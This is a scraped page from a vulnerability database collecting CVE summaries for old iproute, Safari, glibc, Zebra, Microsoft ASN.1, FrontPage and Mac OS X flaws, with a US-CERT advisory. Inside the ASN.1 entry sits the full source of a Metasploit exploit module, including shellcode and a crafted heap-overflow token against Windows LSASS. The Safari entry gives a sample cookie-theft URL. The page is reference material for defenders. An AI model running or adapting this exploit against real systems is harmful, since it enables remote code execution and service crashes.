VARIoT IoT vulnerabilities database

iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface. Red Hat Linux Included in iproute In Linux Netlink Check for messages via the interface is improper, so forged messages Linux Netlink There are vulnerabilities that will be accepted if received via the interface.proute A command included in the package interferes with service operation (DoS) It may be in a state. A problem has been discovered in iproute when handling messages from the kernel. Because of this, it may be possible for an attacker to deny service to legitimate users of a system. iproute is an advanced IP routing and network device configuration tool. No detailed vulnerability details are currently available

Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain. An issue has been discovered in Apple Safari, which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs. This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL. Apple Safari is a WEB browser based on the Apple system. Remote attackers can exploit this vulnerability to construct malicious URLs, lure users to visit them, and steal sensitive cookie information. If the Apple Safari browser loads the following URL for resolution: http://alive.znep.com\\%00www.passport.com/cgi-bin/cookies will cause the Apple Safari browser to connect to \"\\%00\" before host, but sends the cookie to the server based on the entire hostname. This problem can be used to steal the cookie information of a specific path, and through the specific path and SSL in the request URL, it can also steal the cookie information that uses the secure mark

Symbolic link vulnerability in the slpd script slpd.all_init for OpenSLP before 1.0.11 allows local users to overwrite arbitrary files via the route.check temporary file

The FortiGate Firewall is a hardware firewall solution. The WEB interface included in the FortiGate firewall does not adequately filter URL requests. Remote attackers can exploit this vulnerability for cross-site scripting attacks, which can lead to the disclosure of sensitive information. Multiple scripts on the FortiGate firewall's WEB interface do not adequately filter the URI parameters. If you submit parameters containing malicious script code, when the administrator uses the browser to view these logs, these scripts may be executed on the browser and will be leaked. Username and MD5 HASH password information, which can be used to further attack the system. These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser

The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. Applications which make use of the kernel Netlink interface are said to be prone to denial of service attacks. It has been reported that applications implementing the getifaddrs() glibc function may be prone to denial of service attacks. The problem is said to occur due to the way getifaddrs() interacts with the netlink device. Under some circumstances, an anonymous netlink message handled by the getifaddrs() function may cause the application to crash. Red Hat has stated that GNU Zebra, Quagga and iproute are also affected by this vulnerability due to the way they interact with the netlink interface; exploitation may result in a denial of service. The precise technical details regarding this issue are currently unknown. This BID will be updated, as further information is made available. kernel Netlink is a network interface implementation

The vty layer in Quagga before 0.96.4, and Zebra 0.93b and earlier, does not verify that sub-negotiation is taking place when processing the SE marker, which allows remote attackers to cause a denial of service (crash) via a malformed telnet command to the telnet CLI port, which may trigger a null dereference. GNU Zebra A password is set, and zebra If the connection to the module's management port is valid: telnet Sending an undefined code that does not exist as an option when connecting will cause a segmentation violation, zebra A vulnerability exists that causes the daemon to crash.zebra Daemon interferes with service operation (DoS) It may be in a state. It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. All versions of GNU Zebra are said to be vulnerable to this issue. All versions of Quagga prior to 0.96.4 are also vulnerable

Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], [ 'OSVDB', '3902' ], [ 'BID', '9633'], [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'], [ 'MSB', 'MS04-007'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', }, ], ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), ], self.class) end # This exploit is too destructive to use during automated exploitation. # Better Windows-based exploits exist at this time (Sep 2006) def autofilter false end # This is a straight port of Solar Eclipse's "kill-bill" exploit, published # as a Metasploit Framework module with his permission. This module is only # licensed under GPLv2, keep this in mind if you embed the Framework into # a non-GPL application. -hdm[at]metasploit.com def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) case datastore['PROTO'] when 'smb' exploit_smb(token) when 'http' exploit_http(token) else print_status("Invalid application protocol specified, use smb or http") end end def exploit_smb(token) connect client = Rex::Proto::SMB::Client.new(sock) begin client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e if (e.to_s =~ /error code 0x00050001/) print_status("The target system has already been exploited") else print_status("Error: #{e}") end end handler disconnect end def exploit_http(token) connect req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") end handler disconnect end # Returns an ASN.1 encoded string def enc_asn1(str) Rex::Proto::SMB::Utils::asn1encode(str) end # Returns an ASN.1 encoded bit string with 0 unused bits def enc_bits(str) "\x03" + enc_asn1("\x00" + str) end # Returns a BER encoded constructed bit string def enc_constr(*str_arr) "\x23" + enc_asn1(str_arr.join('')) end # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end tag = "\x90\x42\x90\x42\x90\x42\x90\x42" if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second # overwrite which is more useful. fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))), enc_constr( enc_bits(fw + bk) ), enc_constr( enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))), enc_constr( enc_bits("\xeb\x06" + make_nops(6)), enc_bits("D" * 1040) ) ) ) ) token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) "\x30" + enc_asn1( "\xa1" + enc_asn1( bitstring ) ) ) ) return token end end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vulnerabilities in Microsoft ASN.1 Library Original issue date: February 10, 2004 Last revised: -- Source: US-CERT A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS04-007. References * Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324> * Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108> * eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html> * eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html> * Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp> * Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648> _________________________________________________________________ These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. _________________________________________________________________ Feedback can be directed to the author, Art Manion. Copyright 2004 Carnegie Mellon University. Revision History February 10, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----

Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. This issue could be exploited to deny availability of CPU resources on the system, potentially causing a denial of service condition

Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. It is possible to trigger this condition with a chunked-encoded HTTP POST request

Unknown vulnerability in the Terminal application for Mac OS X 10.3 (Client and Server) may allow "unauthorized access.". The precise technical details regarding this issue are currently unknown, however it is believed that a local user may exploit a flaw in Terminal to possibly gain elevated privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available

The System Preferences capability in Mac OS X before 10.3 allows local users to access secure Preference Panes for a short period after an administrator has authenticated to the system. Mac OS X is prone to a local security vulnerability

Mac OS X before 10.3 initializes the TCP timestamp with a constant number, which allows remote attackers to determine the system's uptime via the ID field in a TCP packet. Mac OS X versions prior to 10.3 have a bug in initializing TCP timestamps with constants

Mail in Mac OS X before 10.3, when configured to use MD5 Challenge Response, uses plaintext authentication if the CRAM-MD5 hashed login fails, which could allow remote attackers to gain privileges by sniffing the password. Mail in versions prior to Mac OS X 10.3 is vulnerable

Unknown vulnerability in Mac OS X before 10.3 allows local users to access Dock functions from behind Screen Effects when Full Keyboard Access is enabled using the Keyboard pane in System Preferences. Mac OS X prior to 10.3 has an unknown vulnerability

slpd daemon in Mac OS X before 10.3 allows local users to overwrite arbitrary files via a symlink attack on a temporary file, a different vulnerability than CVE-2003-0875. The slpd daemon in Mac OS X prior to 10.3 is vulnerable

Apple Mac OS X 10.0 through 10.2.8 allows local users with a USB keyboard to gain unauthorized access by holding down the CTRL and C keys when the system is booting, which crashes the init process and leaves the user in a root shell. It has been reported that an attacker with a specific hardware configuration may be capable of gaining root privileges on MacOS X. The problem is said to occur when a user on a system with a USB keyboard, holds a specific key sequence down for an unspecified length. This is said to effectively crash the init process, and drop the user into a shell with root privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system

Buffer overflow in the Mac OS X kernel 10.2.8 and earlier allows local users, and possibly remote attackers, to cause a denial of service (crash), access portions of memory, and possibly execute arbitrary code via a long command line argument (argv[]). A buffer overrun has been discovered in the MacOS X kernel when handling large argv values passed via the command-line. The precise details regarding this condition are currently unknown however the problem likely occurs due to insufficient bounds checking when handling user-supplied data. It has been confirmed that this condition can be exploited to cause a target kernel to crash. Mac OS X is an operating system used on Mac machines, based on the BSD system. By specifying extremely long command-line arguments, a local attacker could cause a Mac OS X kernel panic. The length of the total number of parameters that can trigger this condition is allowed within a small range. When this problem occurs, the operating system crashes immediately, not allowing the user to perform any operations. No logs are produced, nor are there any kernel panic messages. The system will automatically restart after a few minutes. This vulnerability can also be used to dump a small amount of kernel memory information to the attacker, but according to @stake's investigation, only the memory address will be returned to the user, and generally does not contain sensitive information

Unknown vulnerability in QuickTime Java in Mac OS X v10.3 and Mac OS X Server 10.3 allows attackers to gain "unauthorized access to a system.". No detailed vulnerability details are currently available

Finder in Mac OS X 10.2.8 and earlier sets global read/write/execute permissions on directories when they are dragged (copied) from a mounted volume such as a disk image (DMG), which could cause the directories to have less restrictive permissions than intended. These issues may cumulatively allow an attacker to cause denial of service, arbitrary code execution, privilege escalation and unauthorized access. There are multiple instances in Apple Mac OS X where files are installed or created with insecure permissions or inappropriate permissions. This could permit local attackers to modify sensitive files or potentially even replace binaries, which could then be executed by another user. Mac OS X is an operating system used on Mac machines, based on the BSD system. The same happens when dragging a folder into a mounted DMG. This reset only occurs on directories, not file permissions. Because these directories contain applications, an attacker can overwrite any application with a Trojan horse. When executed by other high-privilege users, it will lead to privilege escalation. World-writable files include: - Application and supporting executables. - Directory - Shared Objects - Configuration Files - HTML and JavaScript These files mostly exist in the following directories: -/Applications -/Library/Application Support -/Library/StartupItems

Mac OS X before 10.3 with core files enabled allows local users to overwrite arbitrary files and read core files via a symlink attack on core files that are created with predictable names in the /cores directory. Because of this, a local attacker may be able to overwrite arbitrary root owned files. Apple Mac OS X 10.3 (Panther) has been released to address multiple new and previously known vulnerabilities. These issues may cumulatively allow an attacker to cause denial of service, arbitrary code execution, privilege escalation and unauthorized access. The name of the core file is core.PID(*) , the owner of this file is ROOT, and the setting permission is 0400. Since /cores is globally writable by default, and the name of the core file is predictable, an attacker can establish a symbolic link to point to an important system file. When an application generates a CORE file, the system file will be overwritten, which may elevate privileges or cause denial of service. attack